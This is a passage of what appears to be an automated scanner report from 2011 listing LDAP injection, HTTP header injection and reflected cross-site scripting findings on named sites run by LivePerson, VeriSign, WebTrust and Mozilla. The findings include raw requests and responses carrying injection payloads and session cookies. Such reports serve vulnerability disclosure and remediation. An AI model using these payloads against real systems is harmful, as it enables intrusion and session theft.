HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:35 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:36:35 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)!(sn=* HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:36 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The timeout parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the timeout parameter. The two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)(sn=* &channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603887:-1:1315604093:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 94 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)!(sn=* &channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:10 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 94 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});
2. HTTP header injection
There are 5 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response. Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/activate.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload b75a9%0d%0a75e798ebedb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/b75a9%0d%0a75e798ebedb HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive
Response
HTTP/1.0 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:54 GMT
Location: https://idprotect.verisign.com/toolbar/b75a9
75e798ebedb.v
Content-Length: 0
Connection: close
Content-Type: text/plain
2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/download.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload e39d2%0d%0acc51e9a9020 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/e39d2%0d%0acc51e9a9020 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:54 GMT Location: https://idprotect.verisign.com/toolbar/e39d2 cc51e9a9020 .v Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain
2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/downloadIE.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload b8c36%0d%0ab68ecacc3e6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/b8c36%0d%0ab68ecacc3e6 HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/install.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:48:19 GMT Location: https://idprotect.verisign.com/toolbar/b8c36 b68ecacc3e6 .v Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain
2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/home.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 2c8db%0d%0a9a17d95f3a9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/2c8db%0d%0a9a17d95f3a9 HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:42:10 GMT Location: https://idprotect.verisign.com/toolbar/2c8db 9a17d95f3a9 .v Content-Length: 0 Connection: close Content-Type: text/plain
2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /toolbar/install.v
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 8796f%0d%0aaa90b981baa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /toolbar/8796f%0d%0aaa90b981baa HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:55 GMT Location: https://idprotect.verisign.com/toolbar/8796f aa90b981baa .v Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/plain
3. Cross-site scripting (reflected)
There are 35 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. https://cert.webtrust.org/ViewSeal [id parameter]
Summary
Severity: High
Confidence: Certain
Host: https://cert.webtrust.org
Path: /ViewSeal
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload e2636<script>alert(1)</script>2536d5d1b26 was submitted in the id parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ViewSeal?id=304e2636<script>alert(1)</script>2536d5d1b26 HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:35 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: close Content-Type: text/html Content-Length: 2976 java.lang.NumberFormatException: For input string: "304e2636<script>alert(1)</script>2536d5d1b26 " at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:435) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlet...[SNIP]...
3.2. http://com-verisign.netmng.com/ [height parameter]
Summary
Severity: High
Confidence: Certain
Host: http://com-verisign.netmng.com
Path: /
Issue detail
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 42f25<script>alert(1)</script>04b6e822761 was submitted in the height parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?function=createPopinWindow&name=screen1&width=754&height=42f25<script>alert(1)</script>04b6e822761 &rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:39 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:28:39 GMT Last-Modified: Wed, 07 Sep 2011 21:28:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18558 nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754,42f25<script>alert(1)</script>04b6e822761 , '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\" nam...[SNIP]...
3.3. http://com-verisign.netmng.com/ [width parameter]
Summary
Severity: High
Confidence: Certain
Host: http://com-verisign.netmng.com
Path: /
Issue detail
The value of the width request parameter is copied into the HTML document as plain text between tags. The payload ef64f<script>alert(1)</script>1df44e97474 was submitted in the width parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?function=createPopinWindow&name=screen1&width=754ef64f<script>alert(1)</script>1df44e97474 &height=400&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:36 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:28:36 GMT Last-Modified: Wed, 07 Sep 2011 21:28:36 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18562 nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754ef64f<script>alert(1)</script>1df44e97474 , 400, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\"...[SNIP]...
3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: https://donate.mozilla.org
Path: /favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 559c1<script>alert(1)</script>34648dd8ac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico559c1<script>alert(1)</script>34648dd8ac9 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:57 GMT X-Served-By: moz2 Connection: Keep-Alive Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/ Content-Length: 310 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /favicon.ico559c1<script>alert(1)</script>34648dd8ac9 </p><p><a href="http://donate....[SNIP]...
3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://donate.mozilla.org
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 29f1f<script>alert(1)</script>971a874b532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?29f1f<script>alert(1)</script>971a874b532 =1 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:56 GMT X-Served-By: moz2 Connection: Keep-Alive Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/ Content-Length: 313 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /favicon.ico?29f1f<script>alert(1)</script>971a874b532 =1</p><p><a href="http://dona...[SNIP]...
3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: https://donate.mozilla.org
Path: /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a47c6<script>alert(1)</script>68ca81f006 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006 /script%3E98501cf3ded/contribute/openwebfund HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:57 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 390 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006 /script%3E98501cf3ded/contribute/openwebfund</p>...[SNIP]...
3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: https://donate.mozilla.org
Path: /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 809c8<script>alert(1)</script>eb7bb1b1504 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504 /contribute/openwebfund HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:58 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 391 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded809c8<script>alert(1)</script>eb7bb1b1504 /contribute/openwebfund</p>...[SNIP]...
3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: https://donate.mozilla.org
Path: /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
